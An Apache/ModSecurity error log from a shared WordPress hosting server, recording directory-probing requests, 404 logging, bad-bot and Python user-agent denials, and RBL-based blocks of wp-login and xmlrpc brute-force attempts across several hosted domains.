[Tue May 26 17:14:06.647717 2026] [security2:error] [pid 860158:tid 860297] [client 44.234.85.222:7946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/"] [unique_id "ahWHhoYFlz_JJsUnscLA8AAAAI4"]
[Tue May 26 17:14:06.791028 2026] [autoindex:error] [pid 860158:tid 860289] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:07.116110 2026] [autoindex:error] [pid 860158:tid 860401] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:07.424185 2026] [autoindex:error] [pid 860158:tid 860310] [client 45.86.200.31:39743] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:07.764817 2026] [security2:error] [pid 860158:tid 860358] [client 14.187.246.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHh4YFlz_JJsUnscLBDAAAAMs"]
[Tue May 26 17:14:07.881418 2026] [autoindex:error] [pid 860158:tid 860294] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/calendar/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:08.134350 2026] [security2:error] [pid 860158:tid 860320] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHh4YFlz_JJsUnscLBGwAAAKU"]
[Tue May 26 17:14:08.205077 2026] [security2:error] [pid 860158:tid 860328] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHiIYFlz_JJsUnscLBLgAAAK0"]
[Tue May 26 17:14:08.433416 2026] [autoindex:error] [pid 860158:tid 860407] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/themes/twentytwentyfour/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:08.697888 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHiIYFlz_JJsUnscLBSgAAAMM"]
[Tue May 26 17:14:08.979683 2026] [security2:error] [pid 860158:tid 860291] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHiIYFlz_JJsUnscLBUwAAAIg"]
[Tue May 26 17:14:09.319402 2026] [security2:error] [pid 860158:tid 860361] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHiYYFlz_JJsUnscLBXgAAAM4"]
[Tue May 26 17:14:09.764751 2026] [security2:error] [pid 860158:tid 860355] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHiYYFlz_JJsUnscLBbwAAAMg"]
[Tue May 26 17:14:09.960758 2026] [security2:error] [pid 860158:tid 860365] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHiYYFlz_JJsUnscLBZgAAANI"]
[Tue May 26 17:14:09.977827 2026] [autoindex:error] [pid 860158:tid 860296] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:10.186268 2026] [security2:error] [pid 860158:tid 860324] [client 34.195.212.30:12340] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHioYFlz_JJsUnscLBiQAAAKk"]
[Tue May 26 17:14:10.234166 2026] [autoindex:error] [pid 860158:tid 860291] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:10.385859 2026] [security2:error] [pid 860158:tid 860327] [client 34.195.212.30:65314] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHioYFlz_JJsUnscLBmgAAAKw"]
[Tue May 26 17:14:10.438506 2026] [autoindex:error] [pid 860158:tid 860304] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:10.654453 2026] [security2:error] [pid 860158:tid 860374] [client 34.195.212.30:65322] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWHioYFlz_JJsUnscLBpAAAANs"]
[Tue May 26 17:14:10.691981 2026] [autoindex:error] [pid 860158:tid 860289] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:10.898686 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/sodium_compat/src/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:11.263704 2026] [security2:error] [pid 860158:tid 860290] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHi4YFlz_JJsUnscLBwQAAAIc"]
[Tue May 26 17:14:11.845323 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHi4YFlz_JJsUnscLB1QAAAKE"]
[Tue May 26 17:14:12.088679 2026] [security2:error] [pid 860158:tid 860320] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjIYFlz_JJsUnscLB5AAAAKU"]
[Tue May 26 17:14:12.247827 2026] [security2:error] [pid 860158:tid 860380] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHi4YFlz_JJsUnscLB2QAAAOE"]
[Tue May 26 17:14:12.343229 2026] [security2:error] [pid 860158:tid 860389] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjIYFlz_JJsUnscLB7QAAAOo"]
[Tue May 26 17:14:12.541726 2026] [autoindex:error] [pid 860158:tid 860412] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/plugins/fullscreen/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:12.818545 2026] [security2:error] [pid 860158:tid 860296] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjIYFlz_JJsUnscLCBgAAAI0"]
[Tue May 26 17:14:13.091728 2026] [security2:error] [pid 860158:tid 860406] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjYYFlz_JJsUnscLCDwAAAPs"]
[Tue May 26 17:14:13.502401 2026] [security2:error] [pid 860158:tid 860173] [remote 123.30.233.13:51518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHjYYFlz_JJsUnscLCEwAAoQ4"]
[Tue May 26 17:14:13.720051 2026] [security2:error] [pid 860158:tid 860374] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjYYFlz_JJsUnscLCIgAAANs"]
[Tue May 26 17:14:13.786902 2026] [security2:error] [pid 860158:tid 860357] [client 203.194.101.7:51080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHjYYFlz_JJsUnscLCHwAAAMo"]
[Tue May 26 17:14:13.787048 2026] [security2:error] [pid 860158:tid 860357] [client 203.194.101.7:51080] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHjYYFlz_JJsUnscLCHwAAAMo"]
[Tue May 26 17:14:14.103948 2026] [autoindex:error] [pid 860158:tid 860336] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/interactivity-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:14.304220 2026] [autoindex:error] [pid 860158:tid 860335] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/l10n/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:14.369865 2026] [security2:error] [pid 860158:tid 860325] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHjYYFlz_JJsUnscLCKwAAAKo"]
[Tue May 26 17:14:14.607719 2026] [security2:error] [pid 860158:tid 860399] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHjoYFlz_JJsUnscLCSgAAAPQ"]
[Tue May 26 17:14:14.811264 2026] [security2:error] [pid 860158:tid 860317] [client 103.174.5.177:45785] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHjoYFlz_JJsUnscLCRwAAAKI"]
[Tue May 26 17:14:14.811386 2026] [security2:error] [pid 860158:tid 860317] [client 103.174.5.177:45785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHjoYFlz_JJsUnscLCRwAAAKI"]
[Tue May 26 17:14:14.867660 2026] [autoindex:error] [pid 860158:tid 860404] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/utils/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:15.119782 2026] [security2:error] [pid 860158:tid 860314] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHj4YFlz_JJsUnscLCVwAAAJ8"]
[Tue May 26 17:14:15.413449 2026] [security2:error] [pid 860158:tid 860375] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHj4YFlz_JJsUnscLCXwAAANw"]
[Tue May 26 17:14:15.738448 2026] [security2:error] [pid 860158:tid 860300] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHj4YFlz_JJsUnscLCbQAAAJE"]
[Tue May 26 17:14:16.029585 2026] [security2:error] [pid 860158:tid 860350] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHj4YFlz_JJsUnscLCdgAAAMM"]
[Tue May 26 17:14:16.356186 2026] [security2:error] [pid 860158:tid 860304] [client 81.22.193.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHkIYFlz_JJsUnscLCigAAAJU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:14:16.356784 2026] [security2:error] [pid 860158:tid 860344] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHj4YFlz_JJsUnscLCcwAAAL0"]
[Tue May 26 17:14:16.368765 2026] [security2:error] [pid 860158:tid 860366] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHkIYFlz_JJsUnscLCjgAAANM"]
[Tue May 26 17:14:16.788866 2026] [autoindex:error] [pid 860158:tid 860375] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:16.977510 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/langs/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:17.276761 2026] [autoindex:error] [pid 860158:tid 860298] [client 45.86.200.31:39743] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:17.480105 2026] [autoindex:error] [pid 860158:tid 860350] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/group/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:17.771598 2026] [security2:error] [pid 860158:tid 860379] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHkYYFlz_JJsUnscLC1QAAAOA"]
[Tue May 26 17:14:17.817745 2026] [security2:error] [pid 860158:tid 860414] [client 81.22.193.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHkYYFlz_JJsUnscLC2QAAAQM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 17:14:18.333054 2026] [security2:error] [pid 860158:tid 860323] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHkoYFlz_JJsUnscLDGQAAAKg"]
[Tue May 26 17:14:18.533040 2026] [security2:error] [pid 860158:tid 860331] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHkoYFlz_JJsUnscLDCQAAALA"]
[Tue May 26 17:14:18.766898 2026] [security2:error] [pid 860158:tid 860298] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHkoYFlz_JJsUnscLDJQAAAI8"]
[Tue May 26 17:14:19.178860 2026] [security2:error] [pid 860158:tid 860366] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHk4YFlz_JJsUnscLDPAAAANM"]
[Tue May 26 17:14:19.698026 2026] [autoindex:error] [pid 860158:tid 860318] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:19.961219 2026] [security2:error] [pid 860158:tid 860336] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHk4YFlz_JJsUnscLDXQAAALU"]
[Tue May 26 17:14:20.409986 2026] [security2:error] [pid 860158:tid 860395] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHlIYFlz_JJsUnscLDbwAAAPA"]
[Tue May 26 17:14:20.757101 2026] [security2:error] [pid 860158:tid 860338] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHlIYFlz_JJsUnscLDcAAAALc"]
[Tue May 26 17:14:20.837796 2026] [security2:error] [pid 860158:tid 860339] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHlIYFlz_JJsUnscLDfwAAALg"]
[Tue May 26 17:14:21.066974 2026] [autoindex:error] [pid 860158:tid 860293] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:21.267248 2026] [autoindex:error] [pid 860158:tid 860393] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:21.613606 2026] [security2:error] [pid 860158:tid 860358] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHlYYFlz_JJsUnscLDpAAAAMs"]
